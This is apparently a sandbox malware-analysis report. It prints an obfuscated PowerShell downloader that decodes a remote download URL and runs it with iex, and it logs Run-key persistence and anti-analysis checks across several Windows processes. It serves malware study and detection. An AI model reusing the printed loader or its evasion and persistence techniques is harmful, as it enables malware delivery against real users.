Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. 
Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaMod
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_077BCAF8 pushad ; retf 6_2_077BD369
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219709AD push ecx; mov dword ptr [esp], ecx 10_2_219709B6
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Code function: 11_2_03A553A2 push ebx; iretd 11_2_03A553A3
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Code function: 11_2_03A5F304 push 00000023h; iretd 11_2_03A5F306
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Code function: 11_2_03A5630A push ebx; ret 11_2_03A5632C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Code function: 11_2_03A5F205 pushfd ; retf 11_2_03A5F21A
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Code function: 11_2_03A681AD push esp; retf 11_2_03A681AF
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Code function: 11_2_03A6388F push F39966E4h; ret 11_2_03A638B4
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Code function: 11_2_03A666B9 push edx; retf 11_2_03A666BA
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Code function: 11_2_03A54624 push ecx; ret 11_2_03A54629
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Code function: 11_2_03A5AE22 push ebp; iretd 11_2_03A5AE23
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Code function: 11_2_03A555C2 push es; ret 11_2_03A555C3
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02E009AD push ecx; mov dword ptr [esp], ecx 12_2_02E009B6
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003A705B push esp; retf 12_2_003A705D
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_0039E0B3 pushfd ; retf 12_2_0039E0C8
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003951B8 push ebx; ret 12_2_003951DA
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_0039E1B2 push 00000023h; iretd 12_2_0039E1B4
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003934D2 push ecx; ret 12_2_003934D7
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003A5567 push edx; retf 12_2_003A5568
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003A58E2 push ebp; iretd 12_2_003A5935
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003A5938 push ebp; iretd 12_2_003A5935
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003B0E55 push EFE54BE9h; ret 12_2_003B0E5A
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02C2B688 push esp; iretd 12_2_02C2B68E
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02C2485E push ecx; ret 12_2_02C24847
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02C2681F push ss; retf 12_2_02C26829
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02C24838 push ecx; ret 12_2_02C24847
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02C26939 push esi; retf 12_2_02C2693A
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_02C29F0C push edx; iretd 12_2_02C29F11
          Source: C:\Windows\SysWOW64\ktmutil.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KB60QNXX7JN
          Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ktmutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe API/Special instruction interceptor: Address: 477D0E8
          Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
          Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 10_2_219B096E rdtsc 10_2_219B096E
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7278
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2575
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7064
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2709
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Window / User API: threadDelayed 673
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe API coverage: 0.4 %
          Source: C:\Windows\SysWOW64\ktmutil.exe API coverage: 3.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992 Thread sleep count: 7064 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980 Thread sleep count: 2709 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8092 Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 2720 Thread sleep count: 673 > 30
          Source: C:\Windows\SysWOW64\ktmutil.exe TID: 3992 Thread sleep time: -40000s >= -30000s
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe TID: 7504 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\ktmutil.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 12_2_003AC270 FindFirstFileW,FindNextFileW,FindClose, 12_2_003AC270
          Source: wscript.exe, 00000000.00000003.1720426284.000001C4CB4A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: e Virtualization ServiceRemote Desktop Services UserMode Port RedirectorUPnP Device HostUser ManagerUpdate Orchestrator ServiceVolumetric Audio Compositor ServiceCredential ManagerVirtual DiskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup Engine ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_26d39GameDVR and Broadcast User Service_26d39Bluetooth User Support Service_26d39CaptureService_26d39Clipboard User Service_26d39Connected Devices Platform User Service_26d39ConsentUX_26d39CredentialEnrollmentManagerUserSvc_26d39DeviceAssociationBroker_26d39DevicePicker_26d39DevicesFlow_26d39MessagingService_26d39Sync Host_26d39Contact Data_26d39PrintWorkflow_26d39iagnH
          Source: wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: Hyper-V RAW(\
          Source: powershell.exe, 00000006.00000002.2221760380.00000000075D5000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2332669615.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: Hyper-V RAW
          Source: wabmig.exe, 0000000A.00000003.2332669615.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: Hyper-V RAW"
          Source: ktmutil.exe, 0000000C.00000002.2980525001.0000000000813000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: powershell.exe, 00000001.00000002.2402315774.000001F2B7850000.00000004.00000020.00020000.00000000.sdmp
          Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!!
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\ktmutil.exe
          Process queried: DebugPort
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe
          Code function: 10_2_219B096E rdtsc 10_2_219B096E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Code function: 6_2_0479D41C LdrInitializeThunk,6_2_0479D41C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe
          Code function: 10_2_219F019F mov eax, dword ptr fs:[00000030h] 10_2_219F019F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A062A0 mov eax, dword ptr fs:[00000030h]10_2_21A062A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A329E mov eax, dword ptr fs:[00000030h]10_2_219A329E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A329E mov eax, dword ptr fs:[00000030h]10_2_219A329E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A392A6 mov eax, dword ptr fs:[00000030h]10_2_21A392A6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A392A6 mov eax, dword ptr fs:[00000030h]10_2_21A392A6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A392A6 mov eax, dword ptr fs:[00000030h]10_2_21A392A6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A392A6 mov eax, dword ptr fs:[00000030h]10_2_21A392A6
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F0283 mov eax, dword ptr fs:[00000030h]10_2_219F0283
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F0283 mov eax, dword ptr fs:[00000030h]10_2_219F0283
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F0283 mov eax, dword ptr fs:[00000030h]10_2_219F0283
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE284 mov eax, dword ptr fs:[00000030h]10_2_219AE284
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE284 mov eax, dword ptr fs:[00000030h]10_2_219AE284
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F92BC mov eax, dword ptr fs:[00000030h]10_2_219F92BC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F92BC mov eax, dword ptr fs:[00000030h]10_2_219F92BC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F92BC mov ecx, dword ptr fs:[00000030h]10_2_219F92BC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F92BC mov ecx, dword ptr fs:[00000030h]10_2_219F92BC
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A45283 mov eax, dword ptr fs:[00000030h]10_2_21A45283
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219802A0 mov eax, dword ptr fs:[00000030h]10_2_219802A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219802A0 mov eax, dword ptr fs:[00000030h]10_2_219802A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219852A0 mov eax, dword ptr fs:[00000030h]10_2_219852A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219852A0 mov eax, dword ptr fs:[00000030h]10_2_219852A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219852A0 mov eax, dword ptr fs:[00000030h]10_2_219852A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219852A0 mov eax, dword ptr fs:[00000030h]10_2_219852A0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196B2D3 mov eax, dword ptr fs:[00000030h]10_2_2196B2D3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196B2D3 mov eax, dword ptr fs:[00000030h]10_2_2196B2D3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196B2D3 mov eax, dword ptr fs:[00000030h]10_2_2196B2D3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A452E2 mov eax, dword ptr fs:[00000030h]10_2_21A452E2
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F2D0 mov eax, dword ptr fs:[00000030h]10_2_2199F2D0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F2D0 mov eax, dword ptr fs:[00000030h]10_2_2199F2D0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A212ED mov eax, dword ptr fs:[00000030h]10_2_21A212ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219792C5 mov eax, dword ptr fs:[00000030h]10_2_219792C5
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219792C5 mov eax, dword ptr fs:[00000030h]10_2_219792C5
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A2C3 mov eax, dword ptr fs:[00000030h]10_2_2197A2C3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A2C3 mov eax, dword ptr fs:[00000030h]10_2_2197A2C3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A2C3 mov eax, dword ptr fs:[00000030h]10_2_2197A2C3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A2C3 mov eax, dword ptr fs:[00000030h]10_2_2197A2C3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197A2C3 mov eax, dword ptr fs:[00000030h]10_2_2197A2C3
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199B2C0 mov eax, dword ptr fs:[00000030h]10_2_2199B2C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2F2F8 mov eax, dword ptr fs:[00000030h]10_2_21A2F2F8
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219692FF mov eax, dword ptr fs:[00000030h]10_2_219692FF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219802E1 mov eax, dword ptr fs:[00000030h]10_2_219802E1
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219802E1 mov eax, dword ptr fs:[00000030h]10_2_219802E1
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219802E1 mov eax, dword ptr fs:[00000030h]10_2_219802E1
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A45227 mov eax, dword ptr fs:[00000030h]10_2_21A45227
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A7208 mov eax, dword ptr fs:[00000030h]10_2_219A7208
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A7208 mov eax, dword ptr fs:[00000030h]10_2_219A7208
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196823B mov eax, dword ptr fs:[00000030h]10_2_2196823B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196A250 mov eax, dword ptr fs:[00000030h]10_2_2196A250
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3D26B mov eax, dword ptr fs:[00000030h]10_2_21A3D26B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3D26B mov eax, dword ptr fs:[00000030h]10_2_21A3D26B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21976259 mov eax, dword ptr fs:[00000030h]10_2_21976259
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21969240 mov eax, dword ptr fs:[00000030h]10_2_21969240
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21969240 mov eax, dword ptr fs:[00000030h]10_2_21969240
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
